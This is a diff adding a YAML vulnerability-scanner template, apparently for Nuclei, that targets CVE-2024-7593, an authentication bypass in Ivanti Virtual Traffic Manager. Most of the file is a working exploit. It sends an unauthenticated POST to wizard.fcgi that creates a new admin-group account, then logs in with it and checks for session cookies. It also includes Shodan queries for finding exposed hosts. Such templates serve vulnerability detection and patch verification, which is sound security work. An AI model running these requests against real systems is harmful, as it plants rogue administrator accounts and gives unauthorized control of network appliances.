diff --git a/http/cves/2024/CVE-2024-7593.yaml b/http/cves/2024/CVE-2024-7593.yaml new file mode 100644 index 0000000000..c7f62566b4 --- /dev/null +++ b/http/cves/2024/CVE-2024-7593.yaml @@ -0,0 +1,82 @@ +id: CVE-2024-7593 + +info: + name: Ivanti vTM - Authentication Bypass + author: gy741 + severity: critical + description: | + Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-7593 + - https://packetstormsecurity.com/files/download/179906/ivantiadc99-bypass.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-7593 + cwe-id: CWE-287 + epss-score: 0.00043 + epss-percentile: 0.09526 + metadata: + verified: true + max-request: 1 + vendor: ivanti + product: virtual traffic manager + shodan-query: + - http.favicon.hash:1862800928 + - html:"apps/zxtm/login.cgi" + tags: cve2024,cve,auth-bypass,ivanti + +http: + - raw: + - | + POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 + Host: {{Hostname}} + + _form_submitted=form&create_user=Create&group=admin&newusername={{randstr}}&password1={{randstr}}&password2={{randstr}} + + - | + POST /apps/zxtm/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Origin: https://{{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundarycznFUOqD0Y01A9B5 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Referer: https://{{Hostname}}/apps/zxtm/login.cgi + Accept-Encoding: gzip, deflate, br + Priority: u=0, i + Connection: keep-alive + + ------WebKitFormBoundarycznFUOqD0Y01A9B5 + Content-Disposition: form-data; name="_form_submitted" + + form + ------WebKitFormBoundarycznFUOqD0Y01A9B5 + Content-Disposition: form-data; name="form_username" + + {{randstr}} + ------WebKitFormBoundarycznFUOqD0Y01A9B5 + Content-Disposition: form-data; name="form_password" + + {{randstr}} + ------WebKitFormBoundarycznFUOqD0Y01A9B5 + Content-Disposition: form-data; name="form_submit" + + Login + ------WebKitFormBoundarycznFUOqD0Y01A9B5-- + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Location: /apps/zxtm/" + - "Set-Cookie: ZeusTMZAUTH=" + - "Set-Cookie: ZeusTMZAUTHTIME=" + condition: and + + - type: status + status: + - 302